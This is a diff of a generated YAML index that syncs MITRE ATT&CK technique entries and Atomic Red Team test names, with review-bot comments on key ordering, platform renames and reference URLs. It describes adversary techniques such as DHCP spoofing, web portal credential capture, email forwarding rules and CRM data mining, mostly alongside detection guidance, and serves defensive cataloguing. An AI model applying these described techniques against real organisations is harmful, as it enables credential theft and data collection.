technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -68405,23 +68961,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
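Review bot: this hunk is pure key reordering for T1557.003: x_mitre_contributors, x_mitre_deprecated, x_mitre_domains and x_mitre_is_subtechnique move up with identical values, and the same churn repeats for T1213.001, T1074 and T1213.003 later in the diff. If the serializer emitted keys in a fixed canonical order, or preserved the previous file's order when values are unchanged, the genuine changes in this sync (version bumps, platform renames, reference URL changes) would be far easier to review.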
@@ -68454,21 +69010,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -68576,7 +69131,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests:
- name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -68595,7 +69149,7 @@ collection:
elevation_required: true
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -68606,13 +69160,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -68626,6 +69180,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -68636,12 +69191,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -68686,7 +69241,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests:
- name: Registry artefact when application use webcam
@@ -68705,25 +69259,7 @@ collection:
name: command_prompt
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -68733,31 +69269,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -68790,10 +69343,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -68802,16 +69357,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
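Review bot: the platform change here replaces both Office 365 and Google Workspace with the single value Office Suite (alongside the bump to version 1.4 and the new 'Cloud Service: Cloud Service Metadata' data source), and the same replacement is applied to T1114.002 and T1213 below. Anything in this repo that filters techniques by the old platform strings, for example a per-platform index built from x_mitre_platforms, will silently drop these techniques unless it also maps 'Office Suite'; please check the index generators and call out the rename in the commit message.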
@@ -68843,70 +69399,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
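Review bot: the Mandiant M-Trends 2020 reference changes URL from content.fireeye.com/m-trends/rpt-m-trends-2020 to a mandiant.com PDF while keeping the April 24, 2020 retrieval date, and the Operation Cloud Hopper entry keeps a single-slash `https:/www.pwc.co.uk` inside its web.archive.org path. Both are presumably verbatim from upstream; if the generator applies any URL normalization it must leave the archive path untouched, and the PWC link is worth one fetch to confirm the archive still resolves in that form.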
@@ -68979,7 +69531,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: PowerShell - Prompt User for Password
@@ -69050,7 +69601,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests:
- name: Copy a sensitive File over Administrative share with copy
@@ -69151,7 +69701,7 @@ collection:
elevation_required: true
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -69163,6 +69713,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -69170,11 +69723,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
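Review bot: after this hunk T1114.002 lists Office Suite as its only cloud platform, but the description at the top of the technique still reads "Adversaries may target an Exchange server, Office 365, or Google Workspace", so the prose and the platform list are now inconsistent. That is upstream wording and should not be hand-edited in a generated file, but it means a consumer cannot recover the old platform names from the description; keeping an explicit old-to-new platform mapping in the generator is the safer fix.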
@@ -69191,14 +69744,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -69214,6 +69764,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -69222,13 +69773,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -69236,15 +69787,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
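Review bot: x_mitre_permissions_required (Administrator, SYSTEM, root, User) is dropped for T1056 here, and for T1213.001 earlier, while T1602.002 keeps its Administrator entry unchanged, so after this sync the field is present for some techniques and absent for others. Any code in this repo that reads permissions_required from the index must treat it as optional; if nothing does, a line in the commit message noting that the field is being phased out with the 3.2.0 spec bump saves the next reader the check.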
@@ -69255,9 +69802,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
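Review bot: the new T1213.004 block is inserted between T1056 and T1557.002 because the file appears to be ordered by STIX id (attack-pattern--bb5a00de... for T1056 directly precedes attack-pattern--bbfbb096... for T1213.004), not by technique number, so the CRM sub-technique sits far from T1213.001 and T1213.003. Ordering by external_id would keep sub-techniques next to their parent and make additions land where a reader expects; separately, this entry ships with x_mitre_detection '' and no atomic tests, the same gap as T1557.004 above.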
@@ -69303,7 +69901,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -69322,37 +69920,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -69375,41 +69972,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
